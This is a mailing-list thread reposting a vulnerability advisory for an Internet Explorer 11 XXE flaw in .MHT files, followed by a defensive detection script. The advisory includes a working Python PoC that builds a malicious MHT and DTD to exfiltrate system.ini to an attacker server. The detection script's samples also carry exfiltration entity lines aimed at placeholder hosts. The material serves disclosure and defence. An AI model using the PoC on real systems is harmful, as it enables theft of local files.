Vimeo reinstated my account a few hours later but I switched to YouTube for now.. but will check those out.
Thank you for that...

hyp3rlinx

On Tue, Apr 16, 2019 at 4:12 AM bo0od <bo...@riseup.net> wrote:

> have your own videos either on one of the PeerTubes instances or have
> your own instance.
>
> https://joinpeertube.org/en/
>
> other good alternative would be:
>
> https://mediagoblin.org/pages/tour.html
>
> Enjoy!
>
> hyp3rlinx:
> > vimeo removed my account for no good reason so new POC url is included.
> >
> > [+] Credits: John Page (aka hyp3rlinx)
> > [+] Website: hyp3rlinx.altervista.org
> > [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
> > [+] ISR: ApparitionSec
> >
> >
> > [Vendor]
> > www.microsoft.com
> >
> >
> > [Product]
> > Microsoft Internet Explorer v11
> > (latest version)
> >
> > Internet Explorer is a series of graphical web browsers developed by
> > Microsoft and included in the Microsoft Windows line of operating systems,
> > starting in 1995.
> >
> >
> > [Vulnerability Type]
> > XML External Entity Injection
> >
> >
> > [CVE Reference]
> > N/A
> >
> >
> > [Security Issue]
> > Internet Explorer is vulnerable to XML External Entity attack if a user
> > opens a specially crafted .MHT file locally.
> >
> > This can allow remote attackers to potentially exfiltrate Local files and
> > conduct remote reconnaissance on locally installed
> > Program version information. Example, a request for "c:\Python27\NEWS.txt"
> > can return version information for that program.
> >
> > Upon opening the malicious ".MHT" file locally it should launch Internet
> > Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K"
> > and other interactions like right click "Print Preview" or "Print" commands
> > on the web-page may also trigger the XXE vulnerability.
> >
> > However, a simple call to the window.print() Javascript function should do
> > the trick without requiring any user interaction with the webpage.
> >
> > Importantly, if files are downloaded from the web in a compressed archive
> > and opened using certain archive utilities MOTW may not work as advertised.
> >
> > Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP"
> > users will get a security warning bar in IE and be prompted
> > to activate blocked content. However, when opening a specially crafted .MHT
> > file using malicious <xml> markup tags the user will get no such
> > active content or security bar warnings.
> >
> > e.g.
> >
> > C:\sec>python -m SimpleHTTPServer
> > Serving HTTP on 0.0.0.0 port 8000 ...
> > 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
> > 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] HTTP/1.1" 200 -
> >
> >
> > Tested successfully in latest Internet Explorer Browser v11 with latest
> > security patches on Win7/10 and Server 2012 R2.
> >
> >
> > [POC/Video URL]
> > https://www.youtube.com/watch?v=fbLNbCjgJeY
> >
> >
> > [Exploit/POC]
> > POC to exfil Windows "system.ini" file.
> > Note: Edit attacker server IP in the script to suit your needs.
> >
> > 1) Use below script to create the "datatears.xml" XML and XXE embedded
> > "msie-xxe-0day.mht" MHT file.
> >
> > 2) python -m SimpleHTTPServer
> >
> > 3) Place the generated "datatears.xml" in Python server web-root.
> >
> > 4) Open the generated "msie-xxe-0day.mht" file, watch your files be
> > exfiltrated.
> >
> >
> > #Microsoft Internet Explorer XXE 0day
> > #Creates malicious XXE .MHT and XML files
> > #Open the MHT file in MSIE locally, should exfil system.ini
> > #By hyp3rlinx
> > #ApparitionSec
> > #Python 2 script (print statements, str written in "wb" mode)
> >
> > ATTACKER_IP="localhost"
> > PORT="8000"
> >
> > #MHT container: one text/html part whose <xml> data island carries the DOCTYPE
> > mht_file=(
> > 'From:\n'
> > 'Subject:\n'
> > 'Date:\n'
> > 'MIME-Version: 1.0\n'
> > 'Content-Type: multipart/related; type="text/html";\n'
> > '\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"\n'
> > 'This is a multi-part message in MIME format.\n\n\n'
> >
> > '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\n'
> > 'Content-Type: text/html; charset="UTF-8"\n'
> > 'Content-Location: main.htm\n\n'
> >
> > '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/transitional.dtd">\n'
> > '<html>\n'
> > '<head>\n'
> > '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n'
> > '<title>MSIE XXE 0day</title>\n'
> > '</head>\n'
> > '<body>\n'
> > '<xml>\n'
> > '<?xml version="1.0" encoding="utf-8"?>\n'
> > '<!DOCTYPE r [\n'
> > '<!ELEMENT r ANY >\n'
> > '<!ENTITY % sp SYSTEM "http://'+str(ATTACKER_IP)+":"+PORT+'/datatears.xml">\n'
> > '%sp;\n'
> > '%param1;\n'
> > ']>\n'
> > '<r>&exfil;</r>\n'
> > '<r>&exfil;</r>\n'
> > '<r>&exfil;</r>\n'
> > '<r>&exfil;</r>\n'
> > '</xml>\n'
> > '<script>window.print();</script>\n'
> > '<table cellpadding="0" cellspacing="0" border="0">\n'
> > '<tr>\n'
> > '<td class="contentcell-width">\n'
> > '<h1>MSIE XML External Entity 0day PoC.</h1>\n'
> > '<h3>Discovery: hyp3rlinx</h3>\n'
> > '<h3>ApparitionSec</h3>\n'
> > '</td>\n'
> > '</tr>\n'
> > '</table>\n'
> > '</body>\n'
> > '</html>\n\n\n'
> >
> > '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--'
> > )
> >
> > #Remote DTD fetched via %sp; declares the file entity and the exfil entity
> > xml_file=(
> > '<!ENTITY % data SYSTEM "c:\windows\system.ini">\n'
> > '<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://'+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'
> > '<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">\n'
> > '<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://'+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'
> > )
> >
> > def mk_msie_0day_filez(f,p):
> >     f=open(f,"wb")
> >     f.write(p)
> >     f.close()
> >
> >
> > if __name__ == "__main__":
> >     mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
> >     mk_msie_0day_filez("datatears.xml",xml_file)
> >     print "Microsoft Internet Explorer XML External Entity 0day PoC."
> >     print "Files msie-xxe-0day.mht and datatears.xml Created!."
> >     print "Discovery: Hyp3rlinx / Apparition Security"
> >
> >
> >
> > [Network Access]
> > Remote
> >
> >
> > [Severity]
> > High
> >
> >
> > [Disclosure Timeline]
> > Vendor Notification: March 27, 2019
> > Vendor acknowledgement: March 27, 2019
> > Case Opened: March 28, 2019
> > MSRC response April 10, 2019: "We determined that a fix for this issue will
> > be considered in a future version of this product or service.
> > At this time, we will not be providing ongoing updates of the status of the
> > fix for this issue, and we have closed this case."
> > April 10, 2019 : Public Disclosure
> >
> >
> > [+] Disclaimer
> > The information contained within this advisory is supplied "as-is" with no
> > warranties or guarantees of fitness of use or otherwise.
> > Permission is hereby granted for the redistribution of this advisory,
> > provided that it is not altered except by reformatting it, and
> > that due credit is given. Permission is explicitly given for insertion in
> > vulnerability databases and similar, provided that due credit
> > is given to the author. The author is not responsible for any misuse of the
> > information contained herein and accepts no responsibility
> > for any damage caused by the use or misuse of this information. The author
> > prohibits any malicious use of security related information
> > or exploits by the author or elsewhere. All content (c).
> >
> > hyp3rlinx
> >
> > _______________________________________________
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: http://seclists.org/fulldisclosure/
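The advisory above relies on two ingredients a defender can look for without executing anything: an `<xml>` data island inside an .MHT whose DOCTYPE declares an external (SYSTEM) parameter entity and expands it, and a web-server access log in which a GET query string carries file content rather than parameters. The following is an added example, written here and not part of hyp3rlinx's advisory or PoC: it parses an MHT container with the standard-library `email` package, flags such islands, applies the same entity check to a fetched DTD, and scores access-log lines for query-string exfiltration. The MHT and DTD samples are constructed for this example with placeholder hostnames (`dtd-host.invalid`, `collector.invalid`); the log line is the advisory's own server output; the thresholds (`min_len`, two `[section]` headers) are this example's own choices.

```python
"""Defensive triage for the IE .MHT XXE pattern (added example, not the PoC)."""
import email
import re
from email import policy
from urllib.parse import unquote

# Ingredients of the payload: external entity declarations and parameter-entity
# expansion inside a DOCTYPE internal subset of an <xml> island.
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
PARAM_ENTITY_REF_RE = re.compile(r"%[\w.-]+;")
XML_ISLAND_RE = re.compile(r"<xml\b[^>]*>(.*?)</xml>", re.IGNORECASE | re.DOTALL)
INTERNAL_SUBSET_RE = re.compile(
    r"<!DOCTYPE\b[^\[>]*\[(.*?)\]\s*>", re.IGNORECASE | re.DOTALL)
INI_SECTION_RE = re.compile(r"\[[A-Za-z0-9 ]+\]")


def scan_dtd(text: str) -> dict:
    """Count XXE ingredients in DTD text (an internal subset or a fetched DTD)."""
    return {
        "external_entities": len(EXTERNAL_ENTITY_RE.findall(text)),
        "param_refs": len(PARAM_ENTITY_REF_RE.findall(text)),
    }


def html_parts(mht_bytes: bytes):
    """Yield the decoded text/html parts of an MHT (MIME multipart/related) file."""
    msg = email.message_from_bytes(mht_bytes, policy=policy.default)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            yield part.get_content()


def scan_mht(mht_bytes: bytes) -> list:
    """Return one finding string per suspicious <xml> island; [] if clean."""
    findings = []
    for idx, html in enumerate(html_parts(mht_bytes)):
        for island in XML_ISLAND_RE.findall(html):
            for subset in INTERNAL_SUBSET_RE.findall(island):
                counts = scan_dtd(subset)
                if counts["external_entities"] or counts["param_refs"]:
                    findings.append(
                        "html part %d: <xml> island DOCTYPE declares %d external "
                        "entity(ies) and expands %d parameter entity reference(s)"
                        % (idx, counts["external_entities"], counts["param_refs"]))
    return findings


def looks_like_exfil_query(log_line: str, min_len: int = 100) -> bool:
    """Heuristic over an access-log line: a GET whose URL-decoded query string is
    long and contains INI-style [section] headers, i.e. file content, not params."""
    m = re.search(r'"GET\s+(\S+)\s+HTTP/', log_line)
    if not m:
        return False
    _path, _, query = m.group(1).partition("?")
    decoded = unquote(query)
    return len(decoded) >= min_len and len(INI_SECTION_RE.findall(decoded)) >= 2


def build_sample_mht(island: str) -> bytes:
    """Wrap an <xml> island in a minimal MHT container (constructed sample)."""
    html = "<html><body>\n<xml>\n%s\n</xml>\n<p>static page</p>\n</body></html>" % island
    return (
        "MIME-Version: 1.0\n"
        "Subject: constructed sample\n"
        'Content-Type: multipart/related; type="text/html";\n'
        '\tboundary="=_sample_boundary"\n\n'
        "--=_sample_boundary\n"
        'Content-Type: text/html; charset="UTF-8"\n'
        "Content-Location: main.htm\n\n"
        + html + "\n\n--=_sample_boundary--\n"
    ).encode()


# Constructed samples: the island mirrors the advisory's first stage and the DTD
# its second stage, with placeholder hosts; the log line is the advisory's output.
MALICIOUS_ISLAND = (
    '<?xml version="1.0"?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n'
    '<!ENTITY % sp SYSTEM "http://dtd-host.invalid/remote.dtd">\n'
    '%sp;\n%param1;\n]>\n<r>&exfil;</r>')
BENIGN_ISLAND = '<?xml version="1.0"?>\n<r>static data</r>'
REMOTE_DTD_SAMPLE = (
    '<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">\n'
    '<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://collector.invalid/?%data;\'>">\n')
EXFIL_LOG_LINE = (
    '127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support'
    '[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FON'
    'CGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dll'
    'timer=timer.drv[mci] HTTP/1.1" 200 -')
BENIGN_LOG_LINE = '127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -'

if __name__ == "__main__":
    for label, island in (("malicious", MALICIOUS_ISLAND), ("benign", BENIGN_ISLAND)):
        print(label, scan_mht(build_sample_mht(island)))
    print("remote DTD", scan_dtd(REMOTE_DTD_SAMPLE))
    for line in (EXFIL_LOG_LINE, BENIGN_LOG_LINE):
        print(looks_like_exfil_query(line), line[:60])
```

The MHT check is deliberately static: it never hands the island to an XML parser, so a scanner built on it cannot itself be tricked into resolving the external entity. The log heuristic is a triage aid rather than a signature; it catches the advisory's `system.ini` case because INI files are section-structured, and the threshold should be tuned against the traffic of the server actually being monitored.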